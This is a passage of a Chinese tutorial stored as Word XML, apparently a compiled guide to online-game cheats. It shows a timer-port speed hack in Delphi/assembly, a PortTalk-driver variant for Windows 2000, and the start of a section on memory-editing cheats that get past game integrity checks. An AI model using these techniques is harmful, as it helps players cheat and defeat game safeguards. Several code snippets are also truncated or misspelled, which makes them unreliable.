    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">out $40,al </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／写定时值高位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">iretd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>／／返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>@@exitasm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>end;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　最核心的东西已经写完了，大部份读者是知其然不知其所以然吧，呵呵，不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　先加一个窗口，在窗口上放上一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trackbar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件把其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在这个控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件里写上：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">+inttostr(1742+(10-trackbar1.Position)*160))); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$1742</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以我们把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1742</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做为基数，又因为值越小越快，反之越慢的原理，所以写了这样一个公式，好了，这就是“变速齿轮”的一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＋</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版了（只适用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win9X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），呵呵，试一下吧，这对你帮助会很大的，呵呵。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里，我们不可能实现在直接对端口进行操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ring0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也失了效，有的人就会想到，我们可以写驱动程序来完成呀，但在这里我告诉你，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的驱动不是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VxD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就能实现的，像我这样的低手是写不出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所用的驱动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WDM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，没办法，我只有借助外力实现了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProtTalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是一个很好的设备驱动，他很方便的来实现对低层端口的操作，从而实现加速外挂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们首先要下一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PortTalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动，他的官方网站是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.beyondlogic.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们要把里面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>prottalk.sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拷贝出来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、建立一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Protalk.sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接口（我想省略了，大家可以上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.freewebs.com/liuyue/port...s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件自己看吧）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、实现加速外挂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面就讲一下这程序的实现方法吧，如果说用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProtTalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来操作端口就容易多了，比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限操作方便。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、新建一个工程，把刚刚下的接口文件和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Protalk.sys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起拷到工程文件保存的文件夹下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们在我们新建的工程加入我们的接口文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>uses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">windows,ProtTalk…… </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、我们建立一个过程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">procedure SetRing(value:word); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>if not OpenPortTalk then exit;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>outportb($43,$34);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>outportb($40,lo(Value));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>outprotb($40,hi(value));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>ClosePortTalk;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、先加一个窗口，在窗口上放上一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trackbar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件把其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Max</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在这个控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件里写上：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>+inttostr(1742+(10-trackbar1.Position)*160)));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　就这么容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内存中修改数据的网游外挂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在很多游戏都是把一些信息存入内存单元的，那么我们只需要修改具体内存值就能修改游戏中的属性，很多网络游戏也不外于此。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　曾几何时，一些网络游戏也是可以用内存外挂进行修改的，后来被发现后，这些游戏就把单一内存地址改成多内存地址校验，加大了修改难度，不过仍然可以通过内存分析器可以破解的。诸如“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这样的软件便提供了一定的内存分析功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”是基于内存外挂的佼佼者，是家喻户晓的游戏修改软件。很多同类的软件都是模仿“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”而得到玩家的认可。而“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”实现的技术到现在都没有公开，很多人只能够通过猜测“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的实现方法，实现同类外挂。笔者也曾经模仿过“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”实现相应的功能，如“内存修改”、“内存查询”等技术。稍后会对此技术进行剖析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　既然要做内存外挂，那么就必须对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内存机制有所了解。计算机的内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(RAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总是不够用的，在操作系统中内存就有物理内存和虚拟内存之分，因为程序创建放入物理内存的地址都是在变化的，所以在得到游戏属性时并不能够直接访问物理内存地址。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下，段寄存器使用方法与实模式相同，那么可以通过段寄存器的值左移</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位加上地址偏移量就可以得到线性地址，而程序创建时在线性地址的中保留</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4MB-2GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一段地址，游戏中属性便放于此。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中把虚拟内存块称之为页，而每页为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4KB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
